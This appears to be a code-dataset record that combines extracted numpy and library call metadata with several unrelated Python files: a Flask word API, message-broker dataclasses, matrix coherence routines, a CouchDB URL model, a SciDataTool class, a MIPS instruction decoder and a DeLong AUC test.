'np.allclose', (['x_fp.shape', '(49, 3)'], {}), '(x_fp.shape, (49, 3))\n', (30776, 30797), True, 'import numpy as np\n'), ((30827, 30865), 'numpy.allclose', 'np.allclose', (['x_fp_pol_angles.shape', '(49)'], {}), '(x_fp_pol_angles.shape, 49)\n', (30838, 30865), True, 'import numpy as np\n'), ((30937, 30970), 'numpy.allclose', 'np.allclose', (['time.shape', 'JD.shape'], {}), '(time.shape, JD.shape)\n', (30948, 30970), True, 'import numpy as np\n'), ((31000, 31034), 'numpy.allclose', 'np.allclose', (['theta.shape', 'JD.shape'], {}), '(theta.shape, JD.shape)\n', (31011, 31034), True, 'import numpy as np\n'), ((31064, 31099), 'numpy.allclose', 'np.allclose', (['theta.shape', 'phi.shape'], {}), '(theta.shape, phi.shape)\n', (31075, 31099), True, 'import numpy as np\n'), ((31129, 31162), 'numpy.allclose', 'np.allclose', (['psi.shape', 'phi.shape'], {}), '(psi.shape, phi.shape)\n', (31140, 31162), True, 'import numpy as np\n'), ((31192, 31248), 'numpy.allclose', 'np.allclose', (['psi.shape', 'fp_pointings_spherical.shape[-2]'], {}), '(psi.shape, fp_pointings_spherical.shape[-2])\n', (31203, 31248), True, 'import numpy as np\n'), ((31278, 31335), 'numpy.allclose', 'np.allclose', (['Alt.shape', 'fp_pointings_spherical.shape[:-1]'], {}), '(Alt.shape, fp_pointings_spherical.shape[:-1])\n', (31289, 31335), True, 'import numpy as np\n'), ((31365, 31397), 'numpy.allclose', 'np.allclose', (['Alt.shape', 'Az.shape'], {}), '(Alt.shape, Az.shape)\n', (31376, 31397), True, 'import numpy as np\n'), ((31427, 31459), 'numpy.allclose', 'np.allclose', (['Dec.shape', 'Az.shape'], {}), '(Dec.shape, Az.shape)\n', (31438, 31459), True, 'import numpy as np\n'), ((31489, 31521), 'numpy.allclose', 'np.allclose', (['Dec.shape', 'Ra.shape'], {}), '(Dec.shape, Ra.shape)\n', (31500, 31521), True, 'import numpy as np\n'), ((31551, 31599), 'numpy.allclose', 'np.allclose', (['polarization_angles.shape', 'Ra.shape'], {}), '(polarization_angles.shape, Ra.shape)\n', (31562, 31599), True, 'import numpy as np\n'), ((31629, 31666), 'numpy.allclose', 'np.allclose', (['time.shape', 'Ra.shape[-1]'], {}), '(time.shape, Ra.shape[-1])\n', (31640, 31666), True, 'import numpy as np\n'), ((31696, 31753), 'numpy.allclose', 'np.allclose', (['fp_pointings_spherical.shape[-2]', 'time.shape'], {}), '(fp_pointings_spherical.shape[-2], time.shape)\n', (31707, 31753), True, 'import numpy as np\n'), ((32176, 32198), 'numpy.array', 'np.array', (['[28, 16, 24]'], {}), '([28, 16, 24])\n', (32184, 32198), True, 'import numpy as np\n'), ((32217, 32240), 'numpy.array', 'np.array', (['[-16, 38, 32]'], {}), '([-16, 38, 32])\n', (32225, 32240), True, 'import numpy as np\n'), ((32667, 32689), 'numpy.array', 'np.array', (['[28, 16, 24]'], {}), '([28, 16, 24])\n', (32675, 32689), True, 'import numpy as np\n'), ((32708, 32731), 'numpy.array', 'np.array', (['[-16, 38, 32]'], {}), '([-16, 38, 32])\n', (32716, 32731), True, 'import numpy as np\n'), ((3435, 3452), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['hours'], {}), '(hours)\n', (3445, 3452), True, 'from ScanningTools import ScanningTools as st\n'), ((8401, 8417), 'numpy.diff', 'np.diff', (['JD_step'], {}), '(JD_step)\n', (8408, 8417), True, 'import numpy as np\n'), ((18339, 18379), 'numpy.diff', 'np.diff', (['fp_pointings_c[..., 2]'], {'axis': '(-1)'}), '(fp_pointings_c[..., 2], axis=-1)\n', (18346, 18379), True, 'import numpy as np\n'), ((18575, 18611), 'numpy.sum', 'np.sum', (['(fp_pointings_c ** 2)'], {'axis': '(-1)'}), '(fp_pointings_c ** 2, axis=-1)\n', (18581, 18611), True, 'import numpy as np\n'), ((26032, 26048), 'numpy.abs', 'np.abs', (['(Ra - PRa)'], {}), '(Ra - PRa)\n', (26038, 26048), True, 'import numpy as np\n'), ((29952, 30005), 'numpy.linspace', 'np.linspace', (['(-np.pi)', '(0)', '(sampling_rate * obs_t / 2 + 1)'], {}), '(-np.pi, 0, sampling_rate * obs_t / 2 + 1)\n', (29963, 30005), True, 'import numpy as np\n'), ((3065, 3083), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['angles'], {}), '(angles)\n', (3075, 3083), True, 'from ScanningTools import ScanningTools as st\n'), ((3134, 3152), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['angles'], {}), '(angles)\n', (3144, 3152), True, 'from ScanningTools import ScanningTools as st\n'), ((3364, 3384), 'ScanningTools.ScanningTools.sex2dec', 'st.sex2dec', (['hours[1]'], {}), '(hours[1])\n', (3374, 3384), True, 'from ScanningTools import ScanningTools as st\n'), ((25285, 25306), 'astropy.time.Time', 'Time', (['JD'], {'format': '"""jd"""'}), "(JD, format='jd')\n", (25289, 25306), False, 'from astropy.time import Time\n'), ((18413, 18445), 'numpy.degrees', 'np.degrees', (['fp_pointings[..., 0]'], {}), '(fp_pointings[..., 0])\n', (18423, 18445), True, 'import numpy as np\n'), ((18488, 18520), 'numpy.degrees', 'np.degrees', (['fp_pointings[..., 1]'], {}), '(fp_pointings[..., 1])\n', (18498, 18520), True, 'import numpy as np\n'), ((25971, 25989), 'numpy.abs', 'np.abs', (['(Dec - PDec)'], {}), '(Dec - PDec)\n', (25977, 25989), True, 'import numpy as np\n'), ((27792, 27821), 'numpy.max', 'np.max', (['pol_ang_proj'], {'axis': '(-1)'}), '(pol_ang_proj, axis=-1)\n', (27798, 27821), True, 'import numpy as np\n'), ((27868, 27897), 'numpy.min', 'np.min', (['pol_ang_proj'], {'axis': '(-1)'}), '(pol_ang_proj, axis=-1)\n', (27874, 27897), True, 'import numpy as np\n')] |
from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
from models.word import WordModel
class Word(Resource):
parser = reqparse.RequestParser()
parser.add_argument('stem_id',
type=int,
required=True,
help="Every word needs a stem."
)
#@jwt_required()
def get(self, word_value):
word = WordModel.find_by_word(word_value)
if word:
return word.json()
return {'message': 'Word not found'}, 404
#@jwt_required()
def post(self, word_value):
if WordModel.find_by_word(word_value):
return {'message': "An word with name '{}' already exists.".format(word_value)}, 400
data = Word.parser.parse_args()
word = WordModel(word_value, **data)
try:
word.save_to_db()
except:
return {"message": "An error occurred inserting the word."}, 500
return word.json(), 201
#@jwt_required()
def delete(self, word_value):
word = WordModel.find_by_word(word_value)
if word:
word.delete_from_db()
return {'message': 'word deleted'}
#@jwt_required()
def put(self, word_value):
data = Word.parser.parse_args()
word = WordModel.find_by_word(word_value)
if word is None:
word = WordModel(word_value, **data)
else:
word.stem_id = data['stem_id']
word.text = word_value
word.save_to_db()
return word.json()
class WordList(Resource):
#@jwt_required()
def get(self):
return {'words': [x.json() for x in WordModel.query.all()]} # TODO: pagination
| [
"models.word.WordModel",
"models.word.WordModel.find_by_word",
"flask_restful.reqparse.RequestParser",
"models.word.WordModel.query.all"
] | [((150, 174), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (172, 174), False, 'from flask_restful import Resource, reqparse\n'), ((365, 399), 'models.word.WordModel.find_by_word', 'WordModel.find_by_word', (['word_value'], {}), '(word_value)\n', (387, 399), False, 'from models.word import WordModel\n'), ((563, 597), 'models.word.WordModel.find_by_word', 'WordModel.find_by_word', (['word_value'], {}), '(word_value)\n', (585, 597), False, 'from models.word import WordModel\n'), ((753, 782), 'models.word.WordModel', 'WordModel', (['word_value'], {}), '(word_value, **data)\n', (762, 782), False, 'from models.word import WordModel\n'), ((1024, 1058), 'models.word.WordModel.find_by_word', 'WordModel.find_by_word', (['word_value'], {}), '(word_value)\n', (1046, 1058), False, 'from models.word import WordModel\n'), ((1263, 1297), 'models.word.WordModel.find_by_word', 'WordModel.find_by_word', (['word_value'], {}), '(word_value)\n', (1285, 1297), False, 'from models.word import WordModel\n'), ((1343, 1372), 'models.word.WordModel', 'WordModel', (['word_value'], {}), '(word_value, **data)\n', (1352, 1372), False, 'from models.word import WordModel\n'), ((1632, 1653), 'models.word.WordModel.query.all', 'WordModel.query.all', ([], {}), '()\n', (1651, 1653), False, 'from models.word import WordModel\n')] |
from dataclasses import dataclass
from typing import Dict
from typing import Optional
@dataclass(frozen=True)
class CurrentDestinationStatus:
number_of_pending_messages: Optional[int]
number_of_consumers: int
messages_enqueued: int
messages_dequeued: int
@dataclass(frozen=True)
class ConsumerStatus:
address_to_destination_details: Optional[str]
destination_name: str
session_id: Optional[int]
enqueues: Optional[int]
dequeues: Optional[int]
dispatched: Optional[int]
dispatched_queue: Optional[int]
prefetch: int
max_pending: Optional[int]
exclusive: bool
retroactive: Optional[bool]
@dataclass(frozen=True)
class MessageStatus:
message_id: Optional[str]
details: Dict
persistent: Optional[bool]
correlation_id: str
properties: Optional[Dict]
@dataclass(frozen=True)
class SubscriberSetup:
address_to_subscriber_details: str
subscriber_id: str
destination: str
pending_queue_size: int
dispatched_queue_size: int
dispatched_counter: int
enqueue_counter: int
dequeue_counter: int
| [
"dataclasses.dataclass"
] | [((89, 111), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (98, 111), False, 'from dataclasses import dataclass\n'), ((276, 298), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (285, 298), False, 'from dataclasses import dataclass\n'), ((653, 675), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (662, 675), False, 'from dataclasses import dataclass\n'), ((834, 856), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (843, 856), False, 'from dataclasses import dataclass\n')] |
r"""
Mutual Coherence and Babel Function are the properties of a matrix, used to
estimate the Spark of a matrix, which in turn is used to determine the
optimality of the solution to :math:`\text{P}_0` problem.
Babel Function gives a tighter bound on the Spark of a matrix.
Spark of a matrix :math:`\boldsymbol{A}` is the size of the smallest subset of
linearly dependent columns of :math:`\boldsymbol{A}`.
.. currentmodule:: sparse.coherence
.. autosummary::
:toctree: toctree/coherence/
mutual_coherence
babel
"""
import math
from collections import namedtuple
import numpy as np
CoherenceSpark = namedtuple("CoherenceSpark", ("coherence", "spark"))
def mutual_coherence(mat):
r"""
For an arbitrary input matrix :math:`\boldsymbol{A}` of size `N` x `M`, the
mutual coherence is the maximal absolute inner-product between its
normalized columns :math:`\{ a_i \mid i=1,2,...,M \}`:
.. math::
\mu (\boldsymbol{A}) = \max_{1 \le i < j \le M}
\frac{\mid a_i^\top a_j \mid}{\|a_i\|_2 \|a_j\|_2}
:label: coh
The mutual coherence :math:`\mu` lies in range `[0, 1]`.
At the same time, the Spark lower bound of a matrix is estimated as
.. math::
\text{Spark}(\boldsymbol{A}) \ge 1 + \frac{1}{\mu(\boldsymbol{A})}
:label: spark
Parameters
----------
mat : (N, M) np.ndarray
The input matrix :math:`\boldsymbol{A}`.
Returns
-------
CoherenceSpark
A namedtuple with two attributes:
`.coherence` - mutual coherence of `mat`;
`.spark` - Spark lower bound :eq:`spark` of `mat`.
"""
mat = mat / np.linalg.norm(mat, axis=0)
gram = np.abs(mat.T.dot(mat))
np.fill_diagonal(gram, 0)
mu = gram.max()
spark = math.ceil(1 + 1 / mu)
return CoherenceSpark(mu, spark)
def babel(mat):
r"""
For an arbitrary input matrix :math:`\boldsymbol{A}` of size `N` x `M` and
normalized columns :math:`\{ a_i \mid i=1,2,...,M \}`, the Babel-Function
is defined by
.. math::
\mu_1(k) = \max_{\mid \Lambda \mid = k} \left[ \max_{j \notin \Lambda}
\sum_{i \in \Lambda}{\mid a_i^\top a_j \mid} \right]
:label: babel
If :math:`\mu_1(k-1) < 1`, this implies that any set of :math:`k` columns
from :math:`\boldsymbol{A}` are linearly dependent. In this case, the Spark
necessarily satisfies
.. math::
\text{Spark}(\boldsymbol{A}) > k = 1 + \arg \min_k
\left({\mu_1(k) > 1}\right)
:label: spark_babel
Parameters
----------
mat : (N, M) np.ndarray
The input matrix :math:`\boldsymbol{A}`.
Returns
-------
CoherenceSpark
A `namedtuple` with two attributes:
`.coherence` - a list of `M-1` elements of
:math:`\mu_1(k), \ k=1,2,...,M-1`;
`.spark` - Spark lower bound :eq:`spark_babel` of `mat`.
Notes
-----
:eq:`spark_babel` is a tighter bound on Spark than :eq:`spark`.
"""
mat = mat / np.linalg.norm(mat, axis=0)
gram = np.abs(mat.T.dot(mat))
# Gram matrix' of L2 normalized matrix entries are in range [0, 1]
# with 1s on the diagonal
gram.sort(axis=1) # sort rows
gram = gram[:, ::-1] # in descending order
gram = gram[:, 1:] # skip the first column of 1s (diagonal elements)
gram = gram.cumsum(axis=1) # cumsum rows
mu1 = gram.max(axis=0)
spark = np.nonzero(mu1 > 1)[0][0] + 2
return CoherenceSpark(mu1, spark)
def _quiz4():
mat = np.reshape([16, -2, 15, 13, 5, 6, 8, 8, 9, 4, 11, 12, 4, 12, 10, 1],
(4, 4))
print(mutual_coherence(mat))
print(babel(mat))
if __name__ == '__main__':
_quiz4()
| [
"collections.namedtuple",
"numpy.reshape",
"math.ceil",
"numpy.fill_diagonal",
"numpy.nonzero",
"numpy.linalg.norm"
] | [((615, 667), 'collections.namedtuple', 'namedtuple', (['"""CoherenceSpark"""', "('coherence', 'spark')"], {}), "('CoherenceSpark', ('coherence', 'spark'))\n", (625, 667), False, 'from collections import namedtuple\n'), ((1712, 1737), 'numpy.fill_diagonal', 'np.fill_diagonal', (['gram', '(0)'], {}), '(gram, 0)\n', (1728, 1737), True, 'import numpy as np\n'), ((1770, 1791), 'math.ceil', 'math.ceil', (['(1 + 1 / mu)'], {}), '(1 + 1 / mu)\n', (1779, 1791), False, 'import math\n'), ((3506, 3582), 'numpy.reshape', 'np.reshape', (['[16, -2, 15, 13, 5, 6, 8, 8, 9, 4, 11, 12, 4, 12, 10, 1]', '(4, 4)'], {}), '([16, -2, 15, 13, 5, 6, 8, 8, 9, 4, 11, 12, 4, 12, 10, 1], (4, 4))\n', (3516, 3582), True, 'import numpy as np\n'), ((1646, 1673), 'numpy.linalg.norm', 'np.linalg.norm', (['mat'], {'axis': '(0)'}), '(mat, axis=0)\n', (1660, 1673), True, 'import numpy as np\n'), ((3007, 3034), 'numpy.linalg.norm', 'np.linalg.norm', (['mat'], {'axis': '(0)'}), '(mat, axis=0)\n', (3021, 3034), True, 'import numpy as np\n'), ((3412, 3431), 'numpy.nonzero', 'np.nonzero', (['(mu1 > 1)'], {}), '(mu1 > 1)\n', (3422, 3431), True, 'import numpy as np\n')] |
from datetime import datetime
from couchdb.mapping import BooleanField
from couchdb.mapping import DateTimeField
from couchdb.mapping import Document
from couchdb.mapping import TextField
from .utils import get_random_uid
from .utils import url_for
class URL(Document):
target = TextField()
public = BooleanField()
added = DateTimeField(default=datetime.utcnow())
shorty_id = TextField(default=None)
db = None
@classmethod
def load(cls, id):
return super(URL, cls).load(URL.db, id)
@classmethod
def query(cls, code):
return URL.db.query(code)
def store(self):
if getattr(self._data, "id", None) is None:
new_id = self.shorty_id if self.shorty_id else None
while 1:
id = new_id if new_id else get_random_uid()
try:
docid = URL.db.resource.put(
content=self._data, path="/%s/" % str(id)
)["id"]
except Exception:
continue
if docid:
break
self._data = URL.db.get(docid)
else:
super(URL, self).store(URL.db)
return self
@property
def short_url(self):
return url_for("link", uid=self.id, _external=True)
def __repr__(self):
return "<URL %r>" % self.id
| [
"couchdb.mapping.BooleanField",
"couchdb.mapping.TextField",
"datetime.datetime.utcnow"
] | [((287, 298), 'couchdb.mapping.TextField', 'TextField', ([], {}), '()\n', (296, 298), False, 'from couchdb.mapping import TextField\n'), ((312, 326), 'couchdb.mapping.BooleanField', 'BooleanField', ([], {}), '()\n', (324, 326), False, 'from couchdb.mapping import BooleanField\n'), ((396, 419), 'couchdb.mapping.TextField', 'TextField', ([], {'default': 'None'}), '(default=None)\n', (405, 419), False, 'from couchdb.mapping import TextField\n'), ((361, 378), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (376, 378), False, 'from datetime import datetime\n')] |
# -*- coding: utf-8 -*-
from os import linesep
from SciDataTool.Classes._check import set_array, check_init_dict, check_var, raise_
from SciDataTool.Functions.save import save
from SciDataTool.Classes.DataND import DataND
# Import all class method
# Try/catch to remove unnecessary dependencies in unused method
try:
from SciDataTool.Methods.DataTime.get_harmonics import get_harmonics
except ImportError as error:
get_harmonics = error
try:
from SciDataTool.Methods.DataTime.time_to_freq import time_to_freq
except ImportError as error:
time_to_freq = error
from numpy import array, array_equal
from SciDataTool.Classes._check import InitUnKnowClassError
from SciDataTool.Classes.Data import Data
class DataTime(DataND):
"""Class for physical quantities stored in the time/space domain"""
VERSION = 1
# Check ImportError to remove unnecessary dependencies in unused method
# cf Methods.DataTime.get_harmonics
if isinstance(get_harmonics, ImportError):
get_harmonics = property(
fget=lambda x: raise_(
ImportError(
"Can't use DataTime method get_harmonics: " + str(get_harmonics)
)
)
)
else:
get_harmonics = get_harmonics
# cf Methods.DataTime.time_to_freq
if isinstance(time_to_freq, ImportError):
time_to_freq = property(
fget=lambda x: raise_(
ImportError(
"Can't use DataTime method time_to_freq: " + str(time_to_freq)
)
)
)
else:
time_to_freq = time_to_freq
# save method is available in all object
save = save
def __init__(
self,
axes=None,
normalizations={},
FTparameters={},
values=None,
symbol="",
name="",
unit="",
symmetries={},
init_dict=None,
):
"""Constructor of the class. Can be use in two ways :
- __init__ (arg1 = 1, arg3 = 5) every parameters have name and default values
for Matrix, None will initialise the property with an empty Matrix
for SciDataTool type, None will call the default constructor
- __init__ (init_dict = d) d must be a dictionnary wiht every properties as keys
ndarray or list can be given for Vector and Matrix
object or dict can be given for SciDataTool Object"""
if init_dict is not None: # Initialisation by dict
check_init_dict(
init_dict,
[
"axes",
"normalizations",
"FTparameters",
"values",
"symbol",
"name",
"unit",
"symmetries",
],
)
# Overwrite default value with init_dict content
if "axes" in list(init_dict.keys()):
axes = init_dict["axes"]
if "normalizations" in list(init_dict.keys()):
normalizations = init_dict["normalizations"]
if "FTparameters" in list(init_dict.keys()):
FTparameters = init_dict["FTparameters"]
if "values" in list(init_dict.keys()):
values = init_dict["values"]
if "symbol" in list(init_dict.keys()):
symbol = init_dict["symbol"]
if "name" in list(init_dict.keys()):
name = init_dict["name"]
if "unit" in list(init_dict.keys()):
unit = init_dict["unit"]
if "symmetries" in list(init_dict.keys()):
symmetries = init_dict["symmetries"]
# Initialisation by argument
# Call DataND init
super(DataTime, self).__init__(
axes=axes,
normalizations=normalizations,
FTparameters=FTparameters,
values=values,
symbol=symbol,
name=name,
unit=unit,
symmetries=symmetries,
)
# The class is frozen (in DataND init), for now it's impossible to
# add new properties
def __str__(self):
"""Convert this objet in a readeable string (for print)"""
DataTime_str = ""
# Get the properties inherited from DataND
DataTime_str += super(DataTime, self).__str__() + linesep
return DataTime_str
def __eq__(self, other):
"""Compare two objects (skip parent)"""
if type(other) != type(self):
return False
# Check the properties inherited from DataND
if not super(DataTime, self).__eq__(other):
return False
return True
def as_dict(self):
"""Convert this objet in a json seriable dict (can be use in __init__)
"""
# Get the properties inherited from DataND
DataTime_dict = super(DataTime, self).as_dict()
# The class name is added to the dict fordeserialisation purpose
# Overwrite the mother class name
DataTime_dict["__class__"] = "DataTime"
return DataTime_dict
def _set_None(self):
"""Set all the properties to None (except SciDataTool object)"""
# Set to None the properties inherited from DataND
super(DataTime, self)._set_None()
| [
"SciDataTool.Classes._check.check_init_dict"
] | [((2494, 2618), 'SciDataTool.Classes._check.check_init_dict', 'check_init_dict', (['init_dict', "['axes', 'normalizations', 'FTparameters', 'values', 'symbol', 'name',\n 'unit', 'symmetries']"], {}), "(init_dict, ['axes', 'normalizations', 'FTparameters',\n 'values', 'symbol', 'name', 'unit', 'symmetries'])\n", (2509, 2618), False, 'from SciDataTool.Classes._check import set_array, check_init_dict, check_var, raise_\n')] |
"""
Created on Sun Feb 12 11:51:29 2017
@author: <NAME>
Class: Computer Architecture
Language Python 2.7
Input an array of hex-instructions, and return a of decoded MIPS instructions (e.g. 7a078 ADD $2, $9, $8).
Instruction types de-constructed in this assignment are ADD, AND, OR, SLT, SUB, BEQ, BNE, LW, and SW.
"""
import numpy as np
hex_instructions = [0x022da822, 0x8ef30018, 0x12a70004, 0x02689820,
0xad930018, 0x02697824, 0xad8ffff4, 0x018c6020,
0x02a4a825, 0x158ffff6, 0x8ef9fff0]
# Vectorize hex_instructions as a numpy array so it can be printed in hex format
A = np.array(hex_instructions)
vhex = np.vectorize(hex)
def deconstruct(x):
# Start the address at 4 less than the actual target address, since the PC will be incremented at the begining of each loop iteration
address = int("7a05c", 16)
print
print
print
"The entered hex instructions are :" + str(vhex(A))
print
print
"---------------------------------------------------------------------"
print
"The deconstructed MIPS instructions are:"
print
"---------------------------------------------------------------------"
print
instruction = 0
for x in hex_instructions:
opcode = 0
address += 4 # Increment the PC address for each entry (Branchse are assumed to fail)
"""The for loop will pass each 32-bit instruction through a series of bitwise & maskes that
will isolate a given range. A shift will follow each range-set"""
bits1_32 = bin((x & 0b1111111111111111111111111111111))
bits1_6 = bin((x & 0b11111100000000000000000000000000) >> 26)
bits7_11 = bin((x & 0b00000011111000000000000000000000) >> 21)
bits12_16 = bin((x & 0b00000000000111110000000000000000) >> 16)
bits17_21 = bin((x & 0b00000000000000001111100000000000) >> 11)
bits22_26 = bin((x & 0b00000000000000000000011111000000) >> 6)
bits27_32 = bin((x & 0b00000000000000000000000000111111) >> 0)
bits17_32 = bin((x & 0b00000000000000001111111111111111) >> 0)
bit17 = bin((x & 0b00000000000000001000000000000000) >> 15)
"""A block of if statements conditionally identify each instruction type, by evaluating the contents
of specific bitfields. The first 5 instruction types (ADD, AND, OR, SLT AND SUB) are evaluated by """
if bits1_6 == "0b0" and bits27_32 == "0b100000":
opcode = "ADD"
elif bits1_6 == "0b0" and bits27_32 == "0b100100":
opcode = "AND"
elif bits1_6 == "0b0" and bits27_32 == "0b100101":
opcode = "OR"
elif bits1_6 == "0b0" and bits27_32 == "0b101010":
opcode = "SLT"
elif bits1_6 == "0b0" and bits27_32 == "0b100010":
opcode = "SUB"
elif bits1_6 == "0b100":
opcode = "BEQ"
elif bits1_6 == "0b101":
opcode = "BNE"
elif bits1_6 == "0b100011":
opcode = "LW"
elif bits1_6 == "0b101011":
opcode = "SW"
else:
print
"No opcode found"
"""Once an instruction type has been identified, the bitfields will be used construct an assembly
instruction. Each instruction's rs, rt, rd and offset is isolated according to its instruction
type, and using these binary values, an instruction type will be formed using concatenated strings"""
if opcode == "ADD":
rs = bits7_11
rt = bits12_16
rd = bits17_21
x = bits22_26
offset = 0
func = bits27_32
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rd, 2)) + ", " + "$" + str(
int(rs, 2)) + ", " + "$" + str(int(rt, 2))
elif opcode == "AND":
rs = bits7_11
rt = bits12_16
rd = bits17_21
x = bits22_26
offset = 0
func = bits27_32
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rd, 2)) + ", " + "$" + str(
int(rs, 2)) + ", " + "$" + str(int(rt, 2))
elif opcode == "OR":
rs = bits7_11
rt = bits12_16
rd = bits17_21
x = bits22_26
offset = 0
func = bits27_32
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rd, 2)) + ", " + "$" + str(
int(rs, 2)) + ", " + "$" + str(int(rt, 2))
elif opcode == "SLT":
rs = bits7_11
rt = bits12_16
rd = bits17_21
x = bits22_26
offset = 0
func = bits27_32
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rd, 2)) + ", " + "$" + str(
int(rs, 2)) + ", " + "$" + str(int(rt, 2))
elif opcode == "SUB":
rs = bits7_11
rt = bits12_16
rd = bits17_21
x = bits22_26
offset = 0
func = bits27_32
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rd, 2)) + ", " + "$" + str(
int(rs, 2)) + ", " + "$" + str(int(rt, 2))
elif opcode == "BEQ":
rs = bits7_11
rt = bits12_16
offset = int(bits17_32, 2)
if bit17 == '0b1':
mask = 2 ** ((len((offset)[2:])) - 1)
offset = -(int(offset, 2) & mask) + (int(offset, 2) & ~mask)
new_address = (address) + (offset * 4)
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rs, 2)) + ", " + "$" + str(
int(rt, 2)) + ", " + format(new_address, '02x')
else:
new_address = (address) + (offset * 4)
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rs, 2)) + ", " + "$" + str(
int(rt, 2)) + ", " + format(new_address, '02x')
elif opcode == "BNE":
rs = bits7_11
rt = bits12_16
offset = bits17_32
if bit17 == '0b1':
mask = 2 ** ((len((offset)[2:])) - 1)
offset = -(int(offset, 2) & mask) + (int(offset, 2) & ~mask)
new_address = (address) + (offset * 4)
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rs, 2)) + ", " + "$" + str(
int(rt, 2)) + ", " + format(new_address, '02x')
else:
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rs, 2)) + ", " + "$" + str(
int(rt, 2)) + ", " + format(new_address, '02x')
new_address = (address) + (offset * 4)
elif opcode == "LW":
rs = bits7_11
rt = bits12_16
offset = bits17_32
if bit17 == '0b1':
mask = 2 ** ((len((offset)[2:])) - 1)
offset = -(int(offset, 2) & mask) + (int(offset, 2) & ~mask)
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rt, 2)) + ", " + str(
offset) + ", " + "(" + str(int(rs, 2)) + ")"
else:
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rt, 2)) + ", " + str(
int(offset, 2)) + ", " + "(" + str(int(rs, 2)) + ")"
elif opcode == "SW":
rs = bits7_11
rt = bits12_16
offset = bits17_32
if bit17 == '0b1':
mask = 2 ** ((len((offset)[2:])) - 1)
offset = -(int(offset, 2) & mask) + (int(offset, 2) & ~mask)
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rt, 2)) + ", " + str(
offset) + ", " + "(" + str(int(rs, 2)) + ")"
else:
instruction = format(address, '02x') + ": " + str(opcode) + " $" + str(int(rt, 2)) + ", " + str(
int(offset, 2)) + ", " + "(" + str(int(rs, 2)) + ")"
"""A print instruction set within the for loop will print out the assembly instruction produced by
each iteration through the hex_instructions list. As currently set, the list will only print out the
compiled instruction for each hex input, however un-quoting the
"""
print
instruction
# Unquote the print block belowhere to enable troubleshooting (showing bit fields after each instruction)
"""
print "--------------------------------------------------------------"
print "Address :" + format(address, '02x')
print "bits 1:32 = " + bits1_32
print "bits 1:6 = " + bits1_6
print "bits 7:11 = " + bits7_11
print "bits 12:16 = " + bits12_16
print "bits 17:21 = " + bits17_21
print "bits 22:26 = " + bits22_26
print "bits 27:32 = " + bits27_32
print "bits 17:32 = " + bits17_32
print "bit 17 =" + bit17
print "offset = " + str(offset)
print type(offset)
print "--------------------------------------------------------------"
"""
# Calling the function on the hex_instructions list will execute the defined program.
deconstruct(hex_instructions) | [
"numpy.array",
"numpy.vectorize"
] | [((642, 668), 'numpy.array', 'np.array', (['hex_instructions'], {}), '(hex_instructions)\n', (650, 668), True, 'import numpy as np\n'), ((677, 694), 'numpy.vectorize', 'np.vectorize', (['hex'], {}), '(hex)\n', (689, 694), True, 'import numpy as np\n')] |
import sklearn.datasets
import sklearn.model_selection
import sklearn.linear_model
import numpy
import compare_auc_delong_xu
import unittest
import scipy.stats
class TestIris(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = sklearn.datasets.load_iris()
x_train, x_test, y_train, cls.y_test = sklearn.model_selection.train_test_split(
data.data, (data.target == 1).astype(numpy.int), test_size=0.8, random_state=42)
cls.predictions = sklearn.linear_model.LogisticRegression(solver="lbfgs").fit(
x_train, y_train).predict_proba(x_test)[:, 1]
cls.sklearn_auc = sklearn.metrics.roc_auc_score(cls.y_test, cls.predictions)
def test_variance_const(self):
auc, variance = compare_auc_delong_xu.delong_roc_variance(self.y_test, self.predictions)
numpy.testing.assert_allclose(self.sklearn_auc, auc)
numpy.testing.assert_allclose(0.0015359814789736538, variance)
class TestGauss(unittest.TestCase):
x_distr = scipy.stats.norm(0.5, 1)
y_distr = scipy.stats.norm(-0.5, 1)
def test_variance(self):
sample_size_x = 7
sample_size_y = 14
n_trials = 50000
aucs = numpy.empty(n_trials)
variances = numpy.empty(n_trials)
numpy.random.seed(1234235)
labels = numpy.concatenate([numpy.ones(sample_size_x), numpy.zeros(sample_size_y)])
for trial in range(n_trials):
scores = numpy.concatenate([
self.x_distr.rvs(sample_size_x),
self.y_distr.rvs(sample_size_y)])
aucs[trial] = sklearn.metrics.roc_auc_score(labels, scores)
auc_delong, variances[trial] = compare_auc_delong_xu.delong_roc_variance(
labels, scores)
numpy.testing.assert_allclose(aucs[trial], auc_delong)
numpy.testing.assert_allclose(variances.mean(), aucs.var(), rtol=0.1)
| [
"numpy.ones",
"numpy.testing.assert_allclose",
"compare_auc_delong_xu.delong_roc_variance",
"numpy.zeros",
"numpy.empty",
"numpy.random.seed"
